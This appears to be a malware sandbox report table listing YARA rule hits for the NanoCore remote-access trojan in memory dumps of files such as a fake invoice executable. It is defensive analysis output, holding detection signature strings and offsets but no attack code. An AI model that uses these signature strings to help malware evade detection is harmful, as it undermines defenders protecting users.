13.2.chmac.exe.3011458.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
13.2.chmac.exe.3011458.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.chmac.exe.3011458.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
14.1.chmac.exe.415058.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.1.chmac.exe.415058.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
14.1.chmac.exe.415058.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.1.chmac.exe.415058.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
14.2.chmac.exe.2756888.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
14.2.chmac.exe.2756888.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
16.2.chmac.exe.415058.0.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.2.chmac.exe.415058.0.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
16.2.chmac.exe.415058.0.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.2.chmac.exe.415058.0.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
16.1.chmac.exe.415058.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.1.chmac.exe.415058.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
16.1.chmac.exe.415058.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.1.chmac.exe.415058.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
14.1.chmac.exe.415058.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.1.chmac.exe.415058.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
14.1.chmac.exe.415058.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.1.chmac.exe.415058.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
13.2.chmac.exe.3000000.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
13.2.chmac.exe.3000000.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
13.2.chmac.exe.3000000.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.chmac.exe.3000000.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.6.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
14.2.chmac.exe.415058.0.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.2.chmac.exe.415058.0.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
14.2.chmac.exe.415058.0.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.chmac.exe.415058.0.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
15.2.chmac.exe.2540000.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1d9e5:$x1: NanoCore.ClientPluginHost 0x1da22:$x2: IClientNetworkHost 0x21555:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
15.2.chmac.exe.2540000.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1d75d:$x1: NanoCore Client.exe 0x1d9e5:$x2: NanoCore.ClientPluginHost 0x1f01e:$s1: PluginCommand 0x1f012:$s2: FileCommand 0x1fec3:$s3: PipeExists 0x25c7a:$s4: PipeCreated 0x1da0f:$s5: IClientLoggingHost
15.2.chmac.exe.2540000.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
15.2.chmac.exe.2540000.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1d74d:$a: NanoCore 0x1d75d:$a: NanoCore 0x1d991:$a: NanoCore 0x1d9a5:$a: NanoCore 0x1d9e5:$a: NanoCore 0x1d7ac:$b: ClientPlugin 0x1d9ae:$b: ClientPlugin 0x1d9ee:$b: ClientPlugin 0x1d8d3:$c: ProjectData 0x1e2da:$d: DESCrypto 0x25ca6:$e: KeepAlive 0x23c94:$g: LogClientMessage 0x1fe8f:$i: get_Connected 0x1e610:$j: #=q 0x1e640:$j: #=q 0x1e65c:$j: #=q 0x1e68c:$j: #=q 0x1e6a8:$j: #=q 0x1e6c4:$j: #=q 0x1e6f4:$j: #=q 0x1e710:$j: #=q
15.2.chmac.exe.2551458.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
15.2.chmac.exe.2551458.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
15.2.chmac.exe.2551458.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
15.2.chmac.exe.2551458.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
14.2.chmac.exe.37ac01e.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d0bf:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d0ec:$x2: IClientNetworkHost
14.2.chmac.exe.37ac01e.7.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d0bf:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e19a:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d0d9:$s5: IClientLoggingHost
14.2.chmac.exe.37ac01e.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.chmac.exe.37ac01e.7.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d075:$a: NanoCore 0x2d08a:$a: NanoCore 0x2d0bf:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2ce31:$b: ClientPlugin 0x2ce4c:$b: ClientPlugin
14.0.chmac.exe.400000.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.0.chmac.exe.400000.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
14.0.chmac.exe.400000.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.0.chmac.exe.400000.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.8.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.8.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.8.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.8.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
13.2.chmac.exe.3011458.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
13.2.chmac.exe.3011458.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
13.2.chmac.exe.3011458.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.chmac.exe.3011458.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
14.2.chmac.exe.37b547d.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x23c60:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x23c8d:$x2: IClientNetworkHost
